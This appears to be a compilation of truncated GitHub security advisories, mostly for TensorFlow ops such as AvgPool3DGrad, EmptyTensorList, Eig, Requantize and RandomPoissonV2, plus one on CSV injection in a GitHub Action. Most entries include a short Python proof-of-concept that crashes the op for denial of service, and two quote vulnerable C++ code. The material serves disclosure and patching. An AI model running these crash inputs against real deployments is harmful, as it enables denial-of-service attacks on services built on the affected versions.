ghsa

### Impact The implementation of `AvgPool3DGradOp` does not fully validate the input `orig_input_shape`. This results in an overflow that results in a `CHECK` failure which can be used to trigger a denial of service attack: ```python import tensorflow as tf ksize = [1, 1, 1, 1, 1] strides = [1, 1, 1, 1, 1] padding = "SAME" data_format = "NDHWC" orig_input_shape = tf.constant(1879048192, shape=[5], dtype=tf.int32) grad = tf.constant(1, shape=[1,3,2,4,2], dtype=tf.float32) tf.raw_ops.AvgPool3DGrad(orig_input_shape=orig_input_shape, grad=grad, ksize=ksize, strides=strides, padding=padding, data_format=data_format) ``` ### Patches We have patched the issue in GitHub commit [9178ac9d6389bdc54638ab913ea0e419234d14eb](https://github.com/tensorflow/tensorflow/commit/9178ac9d6389bdc54638ab913ea0e419234d14eb). The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in ...

### Impact If `EmptyTensorList` receives an input `element_shape` with more than one dimension, it gives a `CHECK` fail that can be used to trigger a denial of service attack. ```python import tensorflow as tf tf.raw_ops.EmptyTensorList(element_shape=tf.ones(dtype=tf.int32, shape=[1, 0]), max_num_elements=tf.constant(1),element_dtype=tf.int32) ``` ### Patches We have patched the issue in GitHub commit [c8ba76d48567aed347508e0552a257641931024d](https://github.com/tensorflow/tensorflow/commit/c8ba76d48567aed347508e0552a257641931024d). The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range. ### For more information Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. ### Attribution This vulner...

### Impact `Eig` can be fed an incorrect `Tout` input, resulting in a `CHECK` fail that can trigger a denial of service attack. ```python import tensorflow as tf import numpy as np arg_0=tf.constant(value=np.random.random(size=(2, 2)), shape=(2, 2), dtype=tf.float32) arg_1=tf.complex128 arg_2=True arg_3='' tf.raw_ops.Eig(input=arg_0, Tout=arg_1, compute_v=arg_2, name=arg_3) ``` ### Patches We have patched the issue in GitHub commit [aed36912609fc07229b4d0a7b44f3f48efc00fd0](https://github.com/tensorflow/tensorflow/commit/aed36912609fc07229b4d0a7b44f3f48efc00fd0). The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range. ### For more information Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions...

### Impact When `DrawBoundingBoxes` receives an input `boxes` that is not of dtype `float`, it gives a `CHECK` fail that can trigger a denial of service attack. ```python import tensorflow as tf import numpy as np arg_0=tf.constant(value=np.random.random(size=(1, 3, 2, 3)), shape=(1, 3, 2, 3), dtype=tf.half) arg_1=tf.constant(value=np.random.random(size=(1, 2, 4)), shape=(1, 2, 4), dtype=tf.float32) arg_2='' tf.raw_ops.DrawBoundingBoxes(images=arg_0, boxes=arg_1, name=arg_2) ``` ### Patches We have patched the issue in GitHub commit [da0d65cdc1270038e72157ba35bf74b85d9bda11](https://github.com/tensorflow/tensorflow/commit/da0d65cdc1270038e72157ba35bf74b85d9bda11). The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range. ### For more information Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY...

### Impact This GitHub Action creates a CSV file without sanitizing the output of the APIs. If an alert is dismissed or any other custom field contains executable code / formulas, it might be run when an endpoint opens that CSV file in a spreadsheet program. The data flow looks like this 👇🏻 ```mermaid graph TD A(Repository) -->|developer dismissal, other data input| B(GitHub Advanced Security data) B -->|ghas-to-csv| C(CSV file) C -->|spreadsheet program| D(endpoint executes potentially malicious code) ``` ### Patches Please use version `v1` or later. That tag moves from using `csv` to `defusedcsv` to mitigate this problem. ### Workarounds There is no workaround. Please upgrade to using the latest tag, `v1` (or later). ### References * CWE-1236 information from [MITRE](https://cwe.mitre.org/data/definitions/1236.html) * CSV injection information from [OWASP](https://owasp.org/www-community/attacks/CSV_Injection) * CodeQL query for CWE-1236 in Python [here](ht...

### Impact When `Unbatch` receives a nonscalar input `id`, it gives a `CHECK` fail that can trigger a denial of service attack. ```python import tensorflow as tf import numpy as np arg_0=tf.constant(value=np.random.random(size=(3, 3, 1)), dtype=tf.float64) arg_1=tf.constant(value=np.random.randint(0,100,size=(3, 3, 1)), dtype=tf.int64) arg_2=tf.constant(value=np.random.randint(0,100,size=(3, 3, 1)), dtype=tf.int64) arg_3=47 arg_4='' arg_5='' tf.raw_ops.Unbatch(batched_tensor=arg_0, batch_index=arg_1, id=arg_2, timeout_micros=arg_3, container=arg_4, shared_name=arg_5) ``` ### Patches We have patched the issue in GitHub commit [4419d10d576adefa36b0e0a9425d2569f7c0189f](https://github.com/tensorflow/tensorflow/commit/4419d10d576adefa36b0e0a9425d2569f7c0189f). The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range. ### For...

### Impact When [`mlir::tfg::GraphDefImporter::ConvertNodeDef`](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/core/ir/importexport/graphdef_import.cc) tries to convert NodeDefs without an op name, it crashes. ```cpp Status GraphDefImporter::ConvertNodeDef(OpBuilder &builder, ConversionState &s, const NodeDef &node) { VLOG(4) << "Importing: " << node.name(); OperationState state(ConvertLocation(node), absl::StrCat("tfg.", node.op())); // The GraphImporter does light shape inference, but here we will defer all of // that to the shape inference pass. const OpDef *op_def; const OpRegistrationData *op_reg_data = nullptr; if ((op_reg_data = registry_.LookUp(node.op()))) { op_def = &op_reg_data->op_def; } else { auto it = function_op_defs_.find(node.op()); if (it == function_op_defs_.end()) return InvalidArgument("Unable to find OpDef for ", node.op()); op_def = it->second; } ``` `node.op().empt...

### Impact When [`mlir::tfg::ConvertGenericFunctionToFunctionDef`](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/core/ir/importexport/functiondef_import.cc) is given empty function attributes, it gives a null dereference. ```cpp // Import the function attributes with a `tf.` prefix to match the current // infrastructure expectations. for (const auto& namedAttr : func.attr()) { const std::string& name = "tf." + namedAttr.first; const AttrValue& tf_attr = namedAttr.second; TF_ASSIGN_OR_RETURN(Attribute attr, ConvertAttributeValue(tf_attr, builder, tfgDialect)); attrs.append(name, attr); } ``` If `namedAttr.first` is empty, it will crash. ### Patches We have patched the issue in GitHub commit [1cf45b831eeb0cab8655c9c7c5d06ec6f45fc41b](https://github.com/tensorflow/tensorflow/commit/1cf45b831eeb0cab8655c9c7c5d06ec6f45fc41b). The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2....

### Impact If `Requantize` is given `input_min`, `input_max`, `requested_output_min`, `requested_output_max` tensors of a nonzero rank, it results in a segfault that can be used to trigger a denial of service attack. ```python import tensorflow as tf out_type = tf.quint8 input = tf.constant([1], shape=[3], dtype=tf.qint32) input_min = tf.constant([], shape=[0], dtype=tf.float32) input_max = tf.constant(-256, shape=[1], dtype=tf.float32) requested_output_min = tf.constant(-256, shape=[1], dtype=tf.float32) requested_output_max = tf.constant(-256, shape=[1], dtype=tf.float32) tf.raw_ops.Requantize(input=input, input_min=input_min, input_max=input_max, requested_output_min=requested_output_min, requested_output_max=requested_output_max, out_type=out_type) ``` ### Patches We have patched the issue in GitHub commit [785d67a78a1d533759fcd2f5e8d6ef778de849e0](https://github.com/tensorflow/tensorflow/commit/785d67a78a1d533759fcd2f5e8d6ef778de849e0). The fix will be included in TensorFlow 2....

### Impact When `RandomPoissonV2` receives large input shape and rates, it gives a `CHECK` fail that can trigger a denial of service attack. ```python import tensorflow as tf arg_0=tf.random.uniform(shape=(4,), dtype=tf.int32, maxval=65536) arg_1=tf.random.uniform(shape=(4, 4, 4, 4, 4), dtype=tf.float32, maxval=None) arg_2=0 arg_3=0 arg_4=tf.int32 arg_5=None tf.raw_ops.RandomPoissonV2(shape=arg_0, rate=arg_1, seed=arg_2, seed2=arg_3, dtype=arg_4, name=arg_5) ``` ### Patches We have patched the issue in GitHub commit [552bfced6ce4809db5f3ca305f60ff80dd40c5a3](https://github.com/tensorflow/tensorflow/commit/552bfced6ce4809db5f3ca305f60ff80dd40c5a3). The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range. ### For more information Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/maste...